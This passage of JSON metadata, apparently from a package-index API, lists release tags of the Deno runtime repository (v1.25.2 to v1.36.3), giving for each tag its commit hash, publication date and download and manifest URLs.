ub.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denol